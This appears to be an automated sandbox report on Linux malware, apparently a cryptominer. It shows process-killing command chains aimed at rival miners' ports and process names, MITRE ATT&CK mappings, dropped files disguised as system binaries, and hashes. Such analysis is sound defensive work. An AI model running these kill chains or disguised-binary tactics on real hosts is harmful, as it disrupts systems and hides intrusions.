- /bin/grep
  grep :3333
  2⤵
  PID:954
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:961
- /bin/grep
  grep :3389
  2⤵
  PID:960
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:962
- /bin/grep
  grep -v -
  2⤵
  PID:963
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:964
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:968
- /bin/grep
  grep -v -
  2⤵
  PID:969
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:967
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:970
- /bin/grep
  grep :5555
  2⤵
  PID:966
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:974
- /bin/grep
  grep -v -
  2⤵
  PID:975
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:976
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:973
- /bin/grep
  grep :6666
  2⤵
  PID:972
- /bin/grep
  grep :6665
  2⤵
  PID:978
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:979
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:980
- /bin/grep
  grep -v -
  2⤵
  PID:981
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:982
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:986
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:985
- /bin/grep
  grep -v -
  2⤵
  PID:987
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:988
- /bin/grep
  grep :6667
  2⤵
  PID:984
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:992
- /bin/grep
  grep -v -
  2⤵
  PID:993
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:991
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:994
- /bin/grep
  grep :7777
  2⤵
  PID:990
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:997
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:998
- /bin/grep
  grep :8444
  2⤵
  PID:996
- /bin/grep
  grep -v -
  2⤵
  PID:999
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1000
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1003
- /bin/grep
  grep :3347
  2⤵
  PID:1002
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1004
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1006
- /bin/grep
  grep -v -
  2⤵
  PID:1005
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1010
- /bin/grep
  grep -v -
  2⤵
  PID:1011
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1009
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1012
- /bin/grep
  grep :10008
  2⤵
  PID:1008
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1017
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1016
- /bin/grep
  grep :13531
  2⤵
  PID:1015
- /bin/grep
  grep -v grep
  2⤵
  PID:1014
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1021
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1022
- /bin/grep
  grep :3333
  2⤵
  PID:1020
- /bin/grep
  grep -v grep
  2⤵
  PID:1019
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1018
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1027
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1026
- /bin/grep
  grep :5555
  2⤵
  PID:1025
- /bin/grep
  grep -v grep
  2⤵
  PID:1024
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1023
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1028
- /bin/grep
  grep -v grep
  2⤵
  PID:1029
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1031
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1032
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1030
- /bin/grep
  grep log_
  2⤵
  PID:1035
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1036
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1037
- /bin/grep
  grep -v grep
  2⤵
  PID:1034
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1033
- /bin/grep
  grep systemten
  2⤵
  PID:1040
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  - Reads runtime system information
  PID:1041
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1042
- /bin/grep
  grep -v grep
  2⤵
  PID:1039
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1038
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1047
- - /usr/local/sbin/kill
    kill -9 14
    3⤵
    PID:1048
- - /usr/local/bin/kill
    kill -9 14
    3⤵
    PID:1048
- - /usr/sbin/kill
    kill -9 14
    3⤵
    PID:1048
- - /usr/bin/kill
    kill -9 14
    3⤵
    PID:1048
- - /sbin/kill
    kill -9 14
    3⤵
    PID:1048
- - /bin/kill
    kill -9 14
    3⤵
    PID:1048
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1046
- /bin/grep
  grep netns
  2⤵
  PID:1045
- /bin/grep
  grep -v grep
  2⤵
  PID:1044
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1043

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/zzhs

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit
/usr/bin/irqbalanced

Filesize
2B

MD5
6d7fce9fee471194aa8b5b6e47267f03

SHA1
a3db5c13ff90a36963278c6a39e4ee3c22e2a436

SHA256
1121cfccd5913f0a63fec40a6ffd44ea64f9dc135c66634ba001d10bcf4302a2

SHA512
2b59d179d9815994f687383a886ea34109889756efca5ab27318cc67ce2a21261d12fa6fee6b8c716f72214ead55ee0d789d6c35cff977d40ef5728ba9188a80

Download Submit
/usr/bin/kswaped

Filesize
2B

MD5
26ab0db90d72e28ad0ba1e22ee510510

SHA1
7448d8798a4380162d4b56f9b452e2f6f9e24e7a

SHA256
53c234e5e8472b6ac51c1ae1cab3fe06fad053beb8ebfd8977b010655bfdd3c3

SHA512
63e22ec2fbeebabf005e58fbfb0eee607c4aa417045a68a0cc63767b048e3559268d35e72f367d3b2dbd5dbddf12fc4397762ba149260b3795a0391713bddcd7

Download Submit
/usr/bin/pamdicks

Filesize
2B

MD5
9ae0ea9e3c9c6e1b9b6252c8395efdc1

SHA1
ccf271b7830882da1791852baeca1737fcbe4b90

SHA256
06e9d52c1720fca412803e3b07c4b228ff113e303f4c7ab94665319d832bbfb7

SHA512
f3d08a4bfef201adbe711e8805f96ff13909719107dcac81f4fc9185040d59d8d573344a0707e697f8b4f0212e0d79f3bdd6b86688dd8c54019b9d93c937f3ca

Download Submit
/usr/bin/rctlcli

Filesize
2B

MD5
48a24b70a0b376535542b996af517398

SHA1
9c6b057a2b9d96a4067a749ee3b3b0158d390cf1

SHA256
7de1555df0c2700329e815b93b32c571c3ea54dc967b89e81ab73b9972b72d1d

SHA512
db545c410fd0c8ede533d5b0666cd2798ba380bd25b655619cd5fd3a33a255569b3ccc319bfdef3322d8392d894d15c2e6aa2d53346e6ac54eaf5d627bfe6a9a

Download Submit
/usr/bin/systemd-network

Filesize
2B

MD5
1dcca23355272056f04fe8bf20edfce0

SHA1
5d9474c0309b7ca09a182d888f73b37a8fe1362c

SHA256
f0b5c2c2211c8d67ed15e75e656c7862d086e9245420892a7de62cd9ec582a06

SHA512
29b3573989378848e91465abb8bb12aaad1c40f01ddba6ce5dce4de88d61d49621cd4272bc6f889cd469e9490040b412eb0a237cf2cd49c637da1d5de5903f3d

Download Submit
memory/858-1-0xb6bd6000-0xb6be7044-memory.dmp

Download
memory/955-2-0xb6aa6000-0xb6ab7044-memory.dmp

Download
memory/992-3-0xb6afe000-0xb6b0f044-memory.dmp

Download
memory/1028-4-0xb6b8c000-0xb6b9d044-memory.dmp

Download